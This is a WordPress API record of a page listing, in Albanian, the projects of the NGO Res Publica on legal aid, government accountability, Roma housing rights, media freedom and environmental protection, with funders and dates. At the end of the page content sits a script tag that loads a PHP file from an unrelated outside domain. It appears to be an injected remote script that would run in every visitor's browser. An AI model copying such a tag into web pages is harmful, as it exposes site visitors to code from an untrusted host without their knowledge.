{"id":126,"date":"2013-07-12T22:07:37","date_gmt":"2013-07-12T22:07:37","guid":{"rendered":"http:\/\/www.faqeinternet.al\/res\/?page_id=126"},"modified":"2023-09-22T16:44:13","modified_gmt":"2023-09-22T14:44:13","slug":"projektet","status":"publish","type":"page","link":"https:\/\/www.respublica.org.al\/web\/?page_id=126","title":{"rendered":"Projektet"},"content":{"rendered":"<p>Projektet e realizuara nga qendra Res Publica, sipas objektivave strategjike jan\u00eb:<\/p>\n<p>\u00a0<\/p>\n<p><em><strong>1. Sigurimi i aksesit efektiv n\u00eb drejt\u00ebsi t\u00eb individ\u00ebve n\u00eb nevoj\u00eb<\/strong><\/em><\/p>\n<ul>\n<li>Dh\u00ebnia e ndihm\u00ebs juridike p\u00ebr grupet vulnerab\u00ebl dhe individ\u00ebt n\u00eb nevoj\u00eb \u2013 Fondacioni Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb (2010 &#8211; 2011)<\/li>\n<li>Mb\u00ebshtetje e aksesit n\u00eb drejt\u00ebsi p\u00ebr grat\u00eb dhe vajzat rome dhe ato q\u00eb jetojn\u00eb n\u00eb zonat rurale \u2013 Banka Bot\u00ebrore (2011)<\/li>\n<li>Triple A p\u00ebr qytetar\u00ebt: Akses n\u00eb informacion, K\u00ebshillim dhe Ndihm\u00eb aktive \u2013 BE (IPA\/CSF) p\u00ebrmes ECAS (European Citizen Action Service), Bruksel. (2015 &#8211; 2016)<\/li>\n<\/ul>\n<p><em><strong>2. Sigurimi i llogaridhenies se zyrtareve te shtetit, permes advokimit dhe litigimit strategjik<\/strong><\/em><\/p>\n<ul>\n<li>Dh\u00ebnia e ndihm\u00ebs juridike \/ krijimi i praktikave dhe advokimi p\u00ebr t\u00eb promovuar t\u00eb drejtat e grupeve n\u00eb nevoj\u00eb \u2013 Fondacioni Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb (2011 &#8211; 2012)<\/li>\n<\/ul>\n<p><em><strong>3. Mbrojtja e te drejtave procedurale te viktimave te shkeljeve te te drejtave te njeriut, me fokus te vecante ne mbrojtjen e te drejtave te viktimave ne procesin penal dhe te miturit ne konflikt me ligjin<\/strong><\/em><\/p>\n<ul>\n<li>Vler\u00ebsimi i ndihm\u00ebs juridike n\u00eb procesin penal n\u00eb Shqip\u00ebri \u2013 Open Society Foundations, Human Rights Initiative, Hungari (2015 &#8211; 2016)<\/li>\n<\/ul>\n<p><em><strong>4. Forcimi i transparences dhe mireqeverisjes ne administraten publike, me fokus te vecante ne mbrojtjen e mjedisit dhe sfiden ndaj praktikave korruptive<\/strong><\/em><\/p>\n<ul>\n<li>P\u00ebrmir\u00ebsimi i llogaridh\u00ebnies publike dhe promovimi i sundimit t\u00eb ligjit n\u00eb Shqip\u00ebri lidhur me aksesin n\u00eb dokumentat zyrtar\u00eb \u2013 Open Society Foundations, Human Rights and Good Governance Program, Hungari (2012 &#8211; 2013)<\/li>\n<li>Analizimi dhe vler\u00ebsimi i transparenc\u00ebs s\u00eb qeverisjes \/ sfidimi i kultur\u00ebs s\u00eb pand\u00ebshkueshm\u00ebris\u00eb \u2013 Fondacioni Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb (2014)<\/li>\n<\/ul>\n<p><em><strong>5. Promovimi i te drejtes se strehimit, me fokus te vecante ne mbrojtjen e grupeve te ish qiramarresve te debuar nga pronat e kthyera pronareve dhe komunitetin Rom<\/strong><\/em><\/p>\n<ul>\n<li>Identifikimi dhe adresimi i problemeve t\u00eb komunitetit Rom lidhur me t\u00eb drejt\u00ebn e strehimit \/ promovimi i zhvillimit t\u00eb komunitetit \u2013 Fondacioni Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb (2013 &#8211; 2014)<\/li>\n<li>Promovimi i t\u00eb drejt\u00ebs s\u00eb strehimit p\u00ebr grupet vulnerab\u00ebl \u2013 Civil Rights Defenders (2015)<\/li>\n<\/ul>\n<p><strong><em>6. Zhvillimi i lirise se shprehjes, lirise se informimit dhe gazetarise etike<\/em><\/strong><\/p>\n<ul>\n<li>Promovimi i liris\u00eb s\u00eb shprehjes n\u00eb Shqip\u00ebri \u2013 National Endowment for Democracy (2012 &#8211; 2013)<\/li>\n<li>Promovimi i liris\u00eb s\u00eb informimit n\u00eb Shqip\u00ebri \u2013 National Endowment for Democracy (2013 &#8211; 2014)<\/li>\n<li>Promovimi i vet\u00eb-rregullimit n\u00eb fush\u00ebn e medias \u2013 Civil Rights Defenders (2013)<\/li>\n<li>Promovimi i gazetaris\u00eb investigative t\u00eb p\u00ebrgjegjshme \u2013 South East Europe Media Observatory (2014)<\/li>\n<li>Promovimi i liris\u00eb s\u00eb informimit n\u00eb Shqip\u00ebri \u2013 National Endowment for Democracy (2014 &#8211; 2015)<\/li>\n<li>P\u00ebrmir\u00ebsimi i aft\u00ebsis\u00eb s\u00eb gazetar\u00ebve n\u00eb aksesimin e informacionit dhe p\u00ebrmir\u00ebsimi i gazetaris\u00eb etik\u00eb n\u00eb raportimin e c\u00ebshtjeve \u2013 Civil Rights Defenders (2014)<\/li>\n<li>Promovimi i liris\u00eb s\u00eb shprehjes dhe informimit t\u00eb medias n\u00eb Evrop\u00ebn Juglindore \u2013 P\u00ebrdorimi i reklamave shtet\u00ebrore si form\u00eb e censur\u00ebs s\u00eb but\u00eb \u2013 K\u00ebshilli i Evrop\u00ebs (2015)<\/li>\n<li>Promovimi i angazhimit qytetar n\u00eb advokimin n\u00eb c\u00ebshtjet legjislative \u2013 National Endowment for Democracy (2015 &#8211; 2016)<\/li>\n<\/ul>\n<p><em><strong>7.\u00a0Rritja dhe thellimi i njohurive te avokateve dhe gjyqtareve mbi\u00a0jurisprudencen e Gjykates Evropiane te te Drejtave te Njeriut<\/strong><\/em><\/p>\n<ul>\n<li>Nga teoria n\u00eb praktik\u00eb: e drejta e strehimit dhe mbrojtja nga d\u00ebbimet me forc\u00eb, me focus t\u00eb ve\u00e7aant\u00eb n\u00eb c\u00ebshtjet e komunitetut Rom \/ Egjiptian \u2013 K\u00ebshilli i Evrop\u00ebs (2014)<\/li>\n<\/ul>\n<p><em><strong>8. Mbrojtja e mjedisit dhe biodiversitetit<\/strong><\/em><\/p>\n<ul>\n<li>Let&#8217;s Make Divjana Natural Again \u2013 (2019) &#8211; <a href=\"https:\/\/aos-alb.org\">Shoqata Ornitologjike e Shqip\u00ebris\u00eb (AOS)<\/a> \u00ebsht\u00eb zbatuese e k\u00ebtij projekti n\u00eb partneritet me <a href=\"http:\/\/iliria-al.org\/\">PSEDA-Iliria<\/a> dhe <a href=\"http:\/\/www.respublica.org.al\/\">Res Publica<\/a> mb\u00ebshtetur nga <a href=\"https:\/\/www.cepf.net\/\">Fondi i Partneritetit p\u00ebr Ekosistemet Kritike &#8211; CEPF.<\/a> Projekti &#8220;Le ta B\u00ebjm\u00eb Divjak\u00ebn S\u00ebrish Natyrale!&#8221; synon t\u00eb ruaj\u00eb dhe t\u00eb mbroj\u00eb m\u00eb mir\u00eb biodiversitetin n\u00eb t\u00ebr\u00ebsi t\u00eb Parkut Komb\u00ebtar Divjak\u00eb-Karavasta duke siguruar q\u00ebndrueshm\u00ebri n\u00eb vendimmarrje n\u00ebp\u00ebrmjet p\u00ebrfshirjes s\u00eb komuniteteve vendore n\u00eb aksionet e konservimit t\u00eb natyr\u00ebs si dhe duke stimuluar projekte alternative t\u00eb jetes\u00ebs vendore n\u00eb m\u00ebnyr\u00eb q\u00eb t\u00eb reduktohet presioni mbi burimet natyrore. Projekti do t\u00eb promovoj\u00eb nj\u00eb qasje t\u00eb integruar drejt nxitjes s\u00eb menaxhimit t\u00eb q\u00ebndruesh\u00ebm t\u00eb Parkut Komb\u00ebtar Divjak\u00eb-Karavasta, duke k\u00ebrkuar t\u00eb balancoj\u00eb menaxhimin mjedisor mezhvillimin dhe nevojat e komunitetit.<\/li>\n<\/ul>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Projektet e realizuara nga qendra Res Publica, sipas objektivave strategjike jan\u00eb: \u00a0 1. Sigurimi i aksesit efektiv n\u00eb drejt\u00ebsi t\u00eb [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/126"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=126"}],"version-history":[{"count":7,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/126\/revisions"}],"predecessor-version":[{"id":2631,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/126\/revisions\/2631"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}